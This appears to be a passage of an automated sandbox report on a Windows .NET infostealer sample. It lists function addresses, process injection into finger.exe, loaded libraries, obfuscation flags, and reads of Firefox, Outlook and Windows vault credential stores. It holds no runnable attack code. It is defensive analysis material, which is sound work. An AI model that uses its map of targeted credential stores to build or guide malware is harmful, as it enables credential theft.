                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FB766_2_0124FB76
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AFB806_2_011AFB80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01205BF06_2_01205BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011CDBF96_2_011CDBF9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01203A6C6_2_01203A6C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01247A466_2_01247A46
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FA496_2_0124FA49
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01231AA36_2_01231AA3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122DAAC6_2_0122DAAC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D5AA06_2_011D5AA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0123DAC66_2_0123DAC6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01247D736_2_01247D73
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01193D406_2_01193D40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01241D5A6_2_01241D5A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AFDC06_2_011AFDC0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01209C326_2_01209C32
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FCF26_2_0124FCF2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FF096_2_0124FF09
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01191F926_2_01191F92
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124FFB16_2_0124FFB1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01199EB06_2_01199EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AA3528_2_030AA352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B03E68_2_030B03E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFE3F08_2_02FFE3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030902748_2_03090274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030702C08_2_030702C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308A1188_2_0308A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030781588_2_03078158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B01AA8_2_030B01AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A41A28_2_030A41A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A81CC8_2_030A81CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030820008_2_03082000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE01008_2_02FE0100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030147508_2_03014750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEC7C08_2_02FEC7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF07708_2_02FF0770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300C6E08_2_0300C6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030B05918_2_030B0591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030944208_2_03094420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A24468_2_030A2446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF05358_2_02FF0535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309E4F68_2_0309E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AAB408_2_030AAB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEEA808_2_02FEEA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A6BD78_2_030A6BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FD68B88_2_02FD68B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030069628_2_03006962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030BA9A68_2_030BA9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF28408_2_02FF2840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFA8408_2_02FFA840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF29A08_2_02FF29A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0301E8F08_2_0301E8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03032F288_2_03032F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03010F308_2_03010F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03092F308_2_03092F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03064F408_2_03064F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF0E598_2_02FF0E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0306EFA08_2_0306EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFCFE08_2_02FFCFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AEE268_2_030AEE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE2FC88_2_02FE2FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03002E908_2_03002E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030ACE938_2_030ACE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AEEDB8_2_030AEEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE0CF28_2_02FE0CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308CD1F8_2_0308CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03008DBF8_2_03008DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF0C008_2_02FF0C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FEADE08_2_02FEADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03090CB58_2_03090CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFAD008_2_02FFAD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A132D8_2_030A132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF52A08_2_02FF52A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0303739A8_2_0303739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FDD34C8_2_02FDD34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300B2C08_2_0300B2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030912ED8_2_030912ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF70C08_2_02FF70C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030BB16B8_2_030BB16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0302516C8_2_0302516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FFB1B08_2_02FFB1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FDF1728_2_02FDF172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309F0CC8_2_0309F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A70E98_2_030A70E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF0E08_2_030AF0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF7B08_2_030AF7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030356308_2_03035630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A16CC8_2_030A16CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A75718_2_030A7571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE14608_2_02FE1460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308D5B08_2_0308D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AF43F8_2_030AF43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFB768_2_030AFB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300FB808_2_0300FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03065BF08_2_03065BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0302DBF98_2_0302DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFA498_2_030AFA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A7A468_2_030A7A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03063A6C8_2_03063A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03035AA08_2_03035AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0308DAAC8_2_0308DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03091AA38_2_03091AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0309DAC68_2_0309DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030859108_2_03085910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF38E08_2_02FF38E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300B9508_2_0300B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0305D8008_2_0305D800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF99508_2_02FF9950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFF098_2_030AFF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF9EB08_2_02FF9EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFFB18_2_030AFFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF1F928_2_02FF1F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A1D5A8_2_030A1D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030A7D738_2_030A7D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0300FDC08_2_0300FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_03069C328_2_03069C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FF3D408_2_02FF3D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_030AFCF28_2_030AFCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00601ED08_2_00601ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FCDC08_2_005FCDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FAFF08_2_005FAFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FAFE88_2_005FAFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FCFE08_2_005FCFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FB1408_2_005FB140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FB1368_2_005FB136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_006055608_2_00605560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_006037708_2_00603770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0061BC208_2_0061BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE3988_2_02EDE398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE4B38_2_02EDE4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDCBAA8_2_02EDCBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDD8E38_2_02EDD8E3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDE84C8_2_02EDE84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02EDD9188_2_02EDD918
                Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 0305EA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02FDB970 appears 280 times
                Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 03025130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 0306F290 appears 105 times
                Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 03037E54 appears 103 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: String function: 0120F290 appears 105 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: String function: 011FEA12 appears 86 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: String function: 0117B970 appears 275 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: String function: 011D7E54 appears 101 times
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Code function: String function: 011C5130 appears 58 times
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1550816063.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1549390338.0000000005010000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1546553388.00000000037A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1544491639.00000000009DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000000.00000002.1545416486.00000000027E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefinger.exej% vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.000000000127D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe Binary or memory string: OriginalFilenameIBtw.exe0 vs 72STaC6BmljfbIQ.exe
                Source: 72STaC6BmljfbIQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 72STaC6BmljfbIQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: _0020.AddAccessRule
                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, JLeJ0DSZTD8q7YdFNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, JLeJ0DSZTD8q7YdFNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/2@9/8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\72STaC6BmljfbIQ.exe.log
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exe File created: C:\Users\user\AppData\Local\Temp\40F193-3PQ
                Source: 72STaC6BmljfbIQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 72STaC6BmljfbIQ.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: finger.exe, 00000008.00000002.3269614249.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3269614249.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 72STaC6BmljfbIQ.exe ReversingLabs: Detection: 57%
                Source: unknown Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Section loaded: dwrite.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 72STaC6BmljfbIQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 72STaC6BmljfbIQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PWhloTdOLAusO.exe, 00000007.00000002.3269332968.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp, PWhloTdOLAusO.exe, 0000000B.00000000.1996112338.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 72STaC6BmljfbIQ.exe, 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.72STaC6BmljfbIQ.exe.3876790.0.raw.unpack, d8p59esdy6IQbESTR1.cs.Net Code: mbiuc0QN0pno7t6iwue System.Reflection.Assembly.Load(byte[])
                Source: 0.2.72STaC6BmljfbIQ.exe.6cb0000.4.raw.unpack, d8p59esdy6IQbESTR1.cs.Net Code: mbiuc0QN0pno7t6iwue System.Reflection.Assembly.Load(byte[])
                Source: 0.2.72STaC6BmljfbIQ.exe.5010000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_0277EE60 push esp; iretd 0_2_0277EE61
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC62F1 pushfd ; retf 0_2_04DC62F6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC0A2B push ebp; retf 0_2_04DC0A3A
